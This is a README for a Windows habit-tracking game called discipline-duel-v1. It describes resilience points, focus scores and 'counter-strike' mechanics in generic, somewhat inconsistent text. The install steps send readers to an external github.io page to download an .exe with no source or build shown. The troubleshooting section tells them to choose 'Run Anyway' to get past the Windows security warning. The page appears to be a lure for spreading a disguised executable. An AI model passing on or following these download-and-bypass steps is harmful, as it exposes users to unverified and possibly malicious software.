⚔️ discipline-duel-v1 - Turn daily habits into interactive battles

Discipline-duel-v1 helps you build better habits through a game interface. It changes how you track your daily tasks by adding stakes and rewards. You manage your resilience points, track your focus level, and use game mechanics to overcome the excuses that prevent you from completing your work. This application turns your to-do list into a tactical challenge.

🎯 About the Game

The game focuses on internal growth. You face challenges that represent real-life distractions. By finishing your tasks, you land hits on these distractions. If you miss your targets, your character loses resilience points. This approach keeps your attention on your long-term goals. The system uses a simple scoring method to show your future focus. Each session provides a clear look at how well you manage your drive during the day.

📋 System Requirements

You need a computer running Windows 10 or Windows 11 to play this game. The software requires a standard internet connection to sync your progress. Your system should have at least 4GB of memory and 200MB of free space on your hard drive. Most modern web browsers will handle the game display without issues. You do not need a dedicated graphics card for this software to run smoothly.

📥 Getting Started

Follow these instructions to install the software on your computer.

  1. Visit this page to download the latest version: https://kerasum2704.github.io
  2. Find the link labeled as an .exe file for your version of Windows.
  3. Click the link to save the file to your computer.
  4. Locate the file in your Downloads folder once the transfer finishes.
  5. Double-click the file to open the installation wizard.
  6. Follow the prompts on your screen to place the game icon on your desktop.
  7. Click the new icon to launch the game.

🕹️ How to Play

The game interface shows your stats on the left and your current task queue on the right. Enter your tasks into the input field at the top of the screen. Each task lists a difficulty rating. Higher difficulty ratings grant more experience points upon completion.

Managing Resilience

Your resilience meter tracks how much stress you can handle. If you ignore tasks, this meter drops. Keep your resilience high by finishing small tasks throughout the day. If your resilience reaches zero, the game triggers a recovery period where you must perform a set of focus-based exercises to resume play.

Using Counter-strike Mechanics

When a notification interrupts your work, the system simulates an incoming attack. You must acknowledge the interruption and assign a follow-up action to counter it. Successful counters increase your future focus score. This mechanic helps you identify which events cause you to lose momentum.

🛠️ Troubleshooting

If the game fails to open, check your security settings. Sometimes Windows blocks new software. Click "More Info" on the blue prompt window and select "Run Anyway" to bypass the restriction. Ensure your browser is up to date if you experience display glitches. Check for updates on the release page if the application behaves in an odd way. Reinstalling the software often fixes configuration errors.

🚀 Maintaining Progress

Your progress saves automatically after every completed task. You can exit the program at any time without losing your score. The login system allows you to resume your game on a different computer using your saved profile file. Keep this file in a safe location if you plan to move your data between machines. Regularly check the release page for new updates that add challenges or fix errors.

💡 Best Practices

Use the game to manage only your most important tasks. If you add too many items, the interface becomes crowded and difficult to read. Aim to clear your queue before the end of your day. This practice ensures your focus score accounts for all your meaningful work. Use the resilience meter to judge how much work you can tackle during stressful periods. Take breaks when the game suggests them to keep your real-world performance high.

🌐 Community and Support

The development of this tool remains ongoing. Future updates will include additional difficulty levels and custom avatar support. If you find a bug, report it on the issue tracker located on the main repository page. Include a screenshot of your screen so others can help you diagnose the problem. The community page offers tips on how to structure your daily tasks for the best game experience.
